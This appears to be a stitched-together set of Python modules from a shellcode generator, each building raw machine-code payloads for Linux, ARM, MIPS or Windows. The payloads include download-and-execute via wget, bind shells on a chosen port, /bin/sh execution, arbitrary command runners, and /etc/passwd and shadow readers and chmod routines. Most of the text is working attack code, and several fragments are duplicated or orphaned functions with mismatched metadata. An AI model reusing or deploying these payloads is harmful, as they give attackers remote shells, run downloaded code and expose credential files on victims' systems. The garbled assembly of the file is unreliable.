def __init__(self, **kwargs):
    """Fill ``Shellcode.info`` with the size and payload text for this module.

    Reads ``kwargs["filename"]`` (spliced into the template twice) and
    ``kwargs["url"]`` (spliced in once). Neither value is validated or
    re-encoded here; both are concatenated exactly as received.
    """
    name_text = kwargs["filename"]
    url_text = kwargs["url"]

    # NOTE(review): the URL is handed to getsize() wrapped in a list while the
    # file name is passed bare -- confirm getsize() treats both forms alike.
    Shellcode.info["size"] = (
        101
        + Shellcode().getsize(name_text) * 2
        + Shellcode().getsize([url_text])
    )

    # Fixed byte text surrounding the three caller-supplied slots.
    lead = (
        r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74"
        r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1"
        r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31"
        r"\xc0\x50\xb0\x0f"
    )
    between_names = (
        r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31"
        r"\xc0\x50"
    )
    before_url = (
        r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
        r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52"
    )
    trailer = (
        r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68"
        r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3"
        r"\x52\x51\x53\x89\xe1\xcd\x80"
    )

    # Both entries are stored on the Shellcode class, not on this instance.
    Shellcode.info["payload"] = [
        lead + name_text + between_names + name_text + before_url + url_text + trailer
    ]
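class Payload(Shellcode):
    """Payload module registering its metadata and byte text in ``Shellcode.info``.

    The class-body assignments run when the class statement executes and write
    to the mapping on ``Shellcode`` itself, so the metadata is shared with any
    other subclass that does the same.
    """

    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37285/"
    ]
    # Reference listing only: it hard-codes pushes where the payload text
    # splices in kwargs["file"].
    Shellcode.info["rawassembly"] = [
        "xor %eax,%eax",
        "push %eax",
        "push $0x776f6461",
        "push $0x68732f63",
        "push $0x74652f2f",
        "mov $0xf,%al",
        "mov %esp,%ebx",
        "mov $0x1ff,%cx",
        "int $0x80",
        "xor %eax,%eax",
        "inc %eax",
        "int $0x80",
    ]

    def __init__(self, **kwargs):
        """Store the size and payload text for ``kwargs["file"]``.

        The value is concatenated unchanged; nothing here validates it.
        """
        # kwargs exists only inside __init__, so the size is computed here;
        # evaluating it in the class body raises NameError at class creation.
        Shellcode.info["size"] = 19 + Shellcode().getsize(kwargs["file"])
        Shellcode.info["payload"] = [
            r"\x31\xc0\x50" + kwargs["file"] +
            r"\xb0\x0f\x89\xe3\x66\xb9\xff"
            r"\x01\xcd\x80\x31\xc0\x40\xcd\x80"
        ]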
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["file"]`` is appended to the fixed byte text exactly as received;
    no validation or re-encoding happens here.
    """
    file_text = kwargs["file"]
    Shellcode.info["size"] = 28 + Shellcode().getsize(file_text)

    fixed_bytes = (
        r"\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x78\x46"
        r"\x10\x30\xff\x21\xff\x31\x01\x31\x0f\x37"
        r"\x01\xdf\x40\x40\x01\x27\x01\xdf"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [fixed_bytes + file_text]
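class Payload(Shellcode):
    """Payload module registering its metadata and byte text in ``Shellcode.info``.

    The class-body assignments run when the class statement executes and write
    to the mapping on ``Shellcode`` itself rather than to this subclass.
    """

    Shellcode.info["author"] = "xmgv"
    # NOTE(review): the name and the rawassembly listing take no port, while
    # the payload text below splices in kwargs["lport"] -- the metadata looks
    # copied from a different module; confirm before relying on it.
    Shellcode.info["name"] = "Linux/x86 execve /bin/sh shellcode"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/36398/",
        "https://xmgv.wordpress.com/2015/02/19/28/",
    ]
    Shellcode.info["rawassembly"] = [
        "xor %eax,%eax",
        "push %eax",
        "push $0x68732f2f",
        "push $0x6e69622f",
        "mov %esp,%ebx",
        "push %eax",
        "push %ebx",
        "mov %esp,%ecx",
        "mov $0xb,%al",
        "int $0x80",
    ]

    def __init__(self, **kwargs):
        """Store the size and payload text for ``kwargs["lport"]``.

        The value is concatenated unchanged; nothing here validates it.
        """
        # kwargs exists only inside __init__, so the size is computed here;
        # evaluating it in the class body raises NameError at class creation.
        Shellcode.info["size"] = 94 + Shellcode().getsize(kwargs["lport"])
        Shellcode.info["payload"] = [
            r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53"
            r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
            r"\x66\x43\x52\x66\x68" + kwargs["lport"] +
            r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1"
            r"\xcd\x80\x93\x31\xc9\xb1\x02"
            r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92"
            r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
            r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
        ]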
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["execommand"]`` is appended after the last fixed byte exactly as
    received; no validation or re-encoding happens here.
    """
    command_text = kwargs["execommand"]
    Shellcode.info["size"] = 29 + Shellcode().getsize(command_text)

    # The fixed text already carries a short NUL-terminated ASCII string of
    # its own (0x68 0x65 0x6c 0x6c 0x6f 0x00).
    fixed_bytes = (
        r"\x48\x31\xd2\xe8\x06\x00\x00\x00\x68\x65\x6c"
        r"\x6c\x6f\x00\x5f\x52\x57\x48\x89\xe6\x48\x31"
        r"\xc0\x48\x83\xc8\x3b\x0f\x05"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [fixed_bytes + command_text]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["file"]`` is inserted between two fixed byte runs exactly as
    received; no validation or re-encoding happens here.
    """
    file_text = kwargs["file"]
    Shellcode.info["size"] = 43 + Shellcode().getsize(file_text)

    head = r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05"
    tail = (
        r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0"
        r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80"
        r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd"
        r"\x80\x31\xc0\xb0\x01\xcd\x80"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [head + file_text + tail]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["file"]`` is appended to the fixed byte text exactly as received;
    no validation or re-encoding happens here.
    """
    file_text = kwargs["file"]
    Shellcode.info["size"] = 47 + Shellcode().getsize(file_text)

    fixed_bytes = (
        r"\x31\xc0\x50\x50\xb0\x17\xcd\x91\xeb\x20"
        r"\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62"
        r"\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50"
        r"\x52\x53\xb0\x3b\x50\xcd\x91\x40\x50\x50"
        r"\xcd\x91\xe8\xdb\xff\xff\xff"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [fixed_bytes + file_text]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["execommand"]`` is appended to the fixed byte text exactly as
    received; unlike some sibling modules, this one does not hex-escape it.
    """
    command_text = kwargs["execommand"]
    Shellcode.info["size"] = 44 + Shellcode().getsize(command_text)

    fixed_bytes = (
        r"\xeb\x25\x59\x31\xc0\x50\x68\x6e\x2f\x73\x68"
        r"\x68\x2f\x2f\x62\x69\x89\xe3"
        r"\x50\x66\x68\x2d\x63\x89\xe7\x50"
        r"\x51\x57\x53\x89\xe7\x50\x57\x53"
        r"\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [fixed_bytes + command_text]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["file"]`` is appended after the last fixed byte exactly as
    received; no validation or re-encoding happens here.
    """
    file_text = kwargs["file"]
    Shellcode.info["size"] = 82 + Shellcode().getsize(file_text)

    # NOTE(review): the last fixed run is already the ASCII bytes for
    # /etc/passwd followed by 0x41, and kwargs["file"] is added after it --
    # confirm how the caller-supplied value relates to that built-in string.
    fixed_bytes = (
        r"\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31"
        r"\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89"
        r"\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48"
        r"\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01"
        r"\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff"
        r"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [fixed_bytes + file_text]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["lport"]`` is inserted between two fixed byte runs exactly as
    received; no range check or re-encoding happens here.
    """
    port_text = kwargs["lport"]
    Shellcode.info["size"] = 93 + Shellcode().getsize(port_text)

    head = (
        r"\x68\xff\xd8\xff\x3c\x6a\x65\x89\xe6\xf7\x56\x04\xf6\x16"
        r"\x31\xc0\x50\x68\xff\x02"
    )
    tail = (
        r"\x89\xe7\x6a\x02\x50\x50"
        r"\x6a\x02\x6a\x02\xb0\xe6\xff\xd6\x6a\x10\x57\x50\x31\xc0"
        r"\xb0\xe8\xff\xd6\x5b\x50\x50\x53\xb0\xe9\xff\xd6\xb0\xea"
        r"\xff\xd6\x6a\x09\x50\x6a\x3e\x58\xff\xd6\xff\x4f\xd8\x79"
        r"\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
        r"\x50\x53\x89\xe1\x50\x51\x53\xb0\x3b\xff\xd6"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [head + port_text + tail]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    Each character of ``kwargs["execommand"]`` is rewritten as a backslash-x
    escape before it is measured and appended to the fixed byte text.
    """
    # str.encode("hex") is the Python 2 hex codec; Python 3 raises
    # LookupError on this call.
    escaped_command = "".join(
        ["\\x" + char.encode("hex") for char in kwargs["execommand"]]
    )
    Shellcode.info["size"] = 36 + Shellcode().getsize(escaped_command)

    fixed_bytes = (
        r"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
        r"\x78\x46\x0a\x30\x01\x90"
        r"\x01\xa9\x92\x1a\x0b\x27\x01\xdf"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [fixed_bytes + escaped_command]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["lport"]`` is inserted between two fixed byte runs exactly as
    received; no range check or re-encoding happens here.
    """
    port_text = kwargs["lport"]
    Shellcode.info["size"] = 94 + Shellcode().getsize(port_text)

    head = (
        r"\x31\xc9\xf7\xe1\x51\x40\x50\x40\x50\x50"
        r"\xb0\x61\xcd\x80\x96\x52\x66\x68"
    )
    tail = (
        r"\x66\x68\x01\x02\x89\xe1\x6a\x10\x51\x56\x50\xb0\x68\xcd"
        r"\x80\x31\xc0\xb0\x05\x50\x56\x50\xb0\x6a\xcd\x80\x31\xc0\x50\x50\x56"
        r"\x50\xb0\x1e\xcd\x80\x97\x31\xc0\x50\xb0\x02\xcd\x80\x09\xc0\x74\xea"
        r"\x31\xc9\x31\xc0\x51\x57\x50\xb0\x5a\xcd\x80\xfe\xc1\x80\xf9\x03\x75"
        r"\xf0\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
        r"\xe1\x52\x51\x53\xb0\x3b\x50\xcd\x80"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [head + port_text + tail]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["file"]`` is appended to the fixed byte text exactly as received;
    no validation or re-encoding happens here.
    """
    file_text = kwargs["file"]
    Shellcode.info["size"] = 44 + Shellcode().getsize(file_text)

    fixed_bytes = (
        r"\xff\xff\x06\x28\xff\xff"
        r"\xd0\x04\xff\xff\x05\x28"
        r"\xb6\x01\x05\x24\x01\x10"
        r"\xe4\x27\x1f\xf0\x84\x24"
        r"\xaf\x0f\x02\x24\x0c\x01"
        r"\x01\x01\xff\xff\x04\x28"
        r"\xa1\x0f\x02\x24\x0c\x01"
        r"\x01\x01"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [fixed_bytes + file_text]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    Each character of ``kwargs["execommand"]`` is rewritten as a backslash-x
    escape, then measured and placed between two fixed byte runs.
    """
    # str.encode("hex") is the Python 2 hex codec; Python 3 raises
    # LookupError on this call.
    escaped_command = "".join(
        ["\\x" + char.encode("hex") for char in kwargs["execommand"]]
    )
    Shellcode.info["size"] = 36 + Shellcode().getsize(escaped_command)

    head = (
        r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
        r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12"
        r"\x00\x00\x00"
    )
    tail = r"\x00\x57\x53\x89\xe1\xcd\x80"
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [head + escaped_command + tail]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["lport"]`` is inserted between two fixed byte runs exactly as
    received; no range check or re-encoding happens here.
    """
    port_text = kwargs["lport"]
    Shellcode.info["size"] = 94 + Shellcode().getsize(port_text)

    head = (
        r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53"
        r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
        r"\x66\x43\x52\x66\x68"
    )
    tail = (
        r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89"
        r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
        r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1"
        r"\xcd\x80\x93\x31\xc9\xb1\x02"
        r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92"
        r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
        r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [head + port_text + tail]
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["payload"]`` is inserted between two fixed byte runs exactly as
    received; no validation or re-encoding happens here.
    """
    inner_text = kwargs["payload"]
    Shellcode.info["size"] = 187 + Shellcode().getsize(inner_text)

    head = (
        r"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31"
        r"\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f"
        r"\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89"
        r"\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd"
        r"\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01"
        r"\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b"
        r"\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd"
    )
    tail = (
        r"\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6"
        r"\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75"
        r"\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c"
        r"\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [head + inner_text + tail]
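class Payload(Shellcode):
    """Payload module registering its metadata and byte text in ``Shellcode.info``.

    The class-body assignments run when the class statement executes and write
    to the mapping on ``Shellcode`` itself rather than to this subclass.
    """

    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37297/"
    ]
    # Reference listing only: it hard-codes pushes where the payload text
    # splices in kwargs["file"].
    Shellcode.info["rawassembly"] = [
        "xor %ecx,%ecx",
        "xor %eax,%eax",
        "xor %edx,%edx",
        "push %ecx",
        "mov $0x5,%al",
        "push $0x64777373",
        "push $0x61702f63",
        "push $0x74652f2f",
        "mov %esp,%ebx",
        "int $0x80",
        "mov %ebx,%ecx",
        "mov %eax,%ebx",
        "mov $0x3,%al",
        "mov $0xfff,%dx",
        "inc %dx",
        "int $0x80",
        "xor %eax,%eax",
        "xor %ebx,%ebx",
        "mov $0x1,%bl",
        "mov $0x4,%al",
        "int $0x80",
        "xor %eax,%eax",
        "mov $0x1,%al",
        "int $0x80",
    ]

    def __init__(self, **kwargs):
        """Store the size and payload text for ``kwargs["file"]``.

        The value is concatenated unchanged; nothing here validates it.
        """
        # kwargs exists only inside __init__, so the size is computed here;
        # evaluating it in the class body raises NameError at class creation.
        Shellcode.info["size"] = 43 + Shellcode().getsize(kwargs["file"])
        Shellcode.info["payload"] = [
            r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + kwargs["file"] +
            r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0"
            r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80"
            r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd"
            r"\x80\x31\xc0\xb0\x01\xcd\x80"
        ]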
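class Payload(Shellcode):
    """Payload module registering its metadata and byte text in ``Shellcode.info``.

    The class-body assignments run when the class statement executes and write
    to the mapping on ``Shellcode`` itself rather than to this subclass.
    """

    Shellcode.info["author"] = "Unkown"
    Shellcode.info["name"] = "Linux/x86 - exec shellcode"

    def __init__(self, **kwargs):
        """Store the size and payload text for ``kwargs["execommand"]``.

        Each character of the command is rewritten as a backslash-x escape
        before it is measured and placed between two fixed byte runs.
        """
        db = []
        for x in kwargs["execommand"]:
            # str.encode("hex") is the Python 2 hex codec; Python 3 raises
            # LookupError on this call.
            db.append("\\x"+x.encode("hex"))
        kwargs["execommand"] = "".join(db)
        # kwargs exists only inside __init__, so the size is computed here
        # (and on the escaped form that actually goes into the payload);
        # evaluating it in the class body raises NameError at class creation.
        Shellcode.info["size"] = 36 + Shellcode().getsize(kwargs["execommand"])
        Shellcode.info["payload"] = [
            r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
            r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12"
            r"\x00\x00\x00" +kwargs["execommand"]+
            r"\x00\x57\x53\x89\xe1\xcd\x80"
        ]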
def __init__(self, **kwargs):
    """Record this module's size and payload text in ``Shellcode.info``.

    ``kwargs["file"]`` is inserted between two fixed byte runs exactly as
    received; no validation or re-encoding happens here.
    """
    file_text = kwargs["file"]
    Shellcode.info["size"] = 19 + Shellcode().getsize(file_text)

    head = r"\x31\xc0\x50"
    tail = (
        r"\xb0\x0f\x89\xe3\x66\xb9\xff"
        r"\x01\xcd\x80\x31\xc0\x40\xcd\x80"
    )
    # Stored on the Shellcode class, so it replaces any earlier payload entry.
    Shellcode.info["payload"] = [head + file_text + tail]
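class Payload(Shellcode):
    """Payload module registering its metadata and byte text in ``Shellcode.info``.

    The class-body assignments run when the class statement executes and write
    to the mapping on ``Shellcode`` itself rather than to this subclass.
    """

    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux x86 Download & Execute Shellcode"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/39389/"
    ]
    # Reference listing only: it hard-codes pushes where the payload text
    # splices in kwargs["filename"] and kwargs["url"].
    Shellcode.info["rawassembly"] = [
        "xor eax,eax",
        "mov al,0x2",
        "int 0x80",
        "xor ebx,ebx",
        "cmp eax,ebx",
        "jz 0x47",
        "xor ecx,ecx",
        "xor ebx,ebx",
        "xor eax,eax",
        "push byte +0x5",
        "mov ecx,esp",
        "mov ecx,esp",
        "mov ebx,esp",
        "mov al,0xa2",
        "int 0x80",
        "xor ecx,ecx",
        "xor eax,eax",
        "push eax",
        "mov al,0xf",
        "push byte +0x68",
        "mov ebx,esp",
        "xor ecx,ecx",
        "mov cx,0x1ff",
        "int 0x80",
        "xor eax,eax",
        "push eax",
        "push byte +0x68",
        "mov ebx,esp",
        "push eax",
        "mov edx,esp",
        "push ebx",
        "mov ecx,esp",
        "mov al,0xb",
        "int 0x80",
        "xor eax,eax",
        "inc eax",
        "int 0x80",
        "push byte +0xb",
        "pop eax",
        "cdq",
        "push edx",
        "push dword 0x682f6365",
        "push dword 0x78652f2f",
        "push dword 0x6f692e62",
        "push dword 0x75687469",
        "push dword 0x672e6d34",
        "push dword 0x626d3362",
        "mov ecx,esp",
        "push edx",
        "push byte +0x74",
        "push dword 0x6567772f",
        "push dword 0x6e69622f",
        "push dword 0x7273752f",
        "mov ebx,esp",
        "push edx",
        "push ecx",
        "push ebx",
        "mov ecx,esp",
        "int 0x80",
    ]

    def __init__(self, **kwargs):
        """Store the size and payload text for ``filename`` and ``url``.

        ``kwargs["filename"]`` is spliced in twice and ``kwargs["url"]`` once;
        both are concatenated unchanged and nothing here validates them.
        """
        # kwargs exists only inside __init__, so the size is computed here;
        # evaluating it in the class body raises NameError at class creation.
        # NOTE(review): the URL is handed to getsize() wrapped in a list while
        # the file name is passed bare -- confirm getsize() treats both alike.
        Shellcode.info["size"] = \
            101 + Shellcode().getsize(kwargs["filename"])*2 + Shellcode().getsize([kwargs["url"]])
        Shellcode.info["payload"] = [
            r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74"
            r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1"
            r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31"
            r"\xc0\x50\xb0\x0f" +kwargs["filename"]+
            r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31"
            r"\xc0\x50" +kwargs["filename"]+
            r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
            r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52" +kwargs["url"]+
            r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68"
            r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3"
            r"\x52\x51\x53\x89\xe1\xcd\x80"
        ]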